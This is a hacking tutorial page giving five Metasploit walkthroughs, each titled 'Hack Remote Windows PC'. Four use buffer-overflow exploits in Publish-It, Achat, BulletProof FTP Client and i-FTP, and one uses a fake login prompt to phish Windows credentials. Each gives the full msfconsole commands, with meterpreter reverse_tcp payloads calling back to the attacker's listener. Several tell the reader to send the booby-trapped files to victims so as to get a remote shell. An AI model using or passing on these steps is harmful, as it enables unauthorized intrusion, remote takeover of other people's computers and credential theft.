Hack Remote Windows PC using Publish-It PUI Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in Publish-It when processing a specially crafted .PUI file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Publish-It to open a malicious .PUI file.

Exploit Targets

Publish-It

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/publishit_pui

msf exploit (publishit_pui)>set payload windows/meterpreter/reverse_tcp

msf exploit (publishit_pui)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (publishit_pui)>exploit  

After we successfully generate the malicious pui File, it will stored on your local computer

/root/.msf4/local/msf.pui

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.5

exploit

Now send your msf.pui files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Hack Remote Windows PC Password using Phishing Login Prompt

This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use post/windows/gather/phish_windows_credentials

msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp

msf exploit (phish_windows_credentials)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (phish_windows_credentials)>set session 1

msf exploit (phish_windows_credentials)>exploit  

Hack Remote Windows PC using Achat Unicode SEH Buffer Overflow

This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it's possible to overwrite the SEH handler. Even when the exploit is reliable, it depends on timing since there are two threads overflowing the stack in the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.

Exploit Targets

Achat v0.150

Requirement

Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/misc/achat_bof

msf exploit (achat_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (achat_bof)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (achat_bof)>set rhost 192.168.1.8 (IP of Remote Host)

msf exploit (achat_bof)>exploit

Hack Remote Windows PC using BulletProof FTP Client BPS Buffer Overflow

This module exploits stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

BulletProof FTP Client 2010

Requirement

Attacker: kali Linux

Victim PC: Windows XP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/bpftp_client_bps_bof

msf exploit (bpftp_client_bps_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (bpftp_client_bps_bof)>set lhost 192.168.0.107 (IP of Local Host)

msf exploit (bpftp_client_bps_bof)>exploit

After we successfully generate the malicious bps File, it will stored on your local computer

/root/.msf4/local/msf.bps

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.107

exploit

Now send your msf.bps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Remote Windows PC using i-FTP Schedule Buffer Overflow

This module exploits stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

i-Ftp v2.20

Requirement

Attacker: kali Linux

Victim PC: Windows XP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/fileformat/iftp_schedule_bof

msf exploit (iftp_schedule_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (iftp_schedule_bof)>set lhost 192.168.0.107 (IP of Local Host)

msf exploit (iftp_schedule_bof)>exploit

After we successfully generate the malicious xml File, it will stored on your local computer

/root/.msf4/local/schedule.xml

Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.107

exploit

Now send your schedule.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.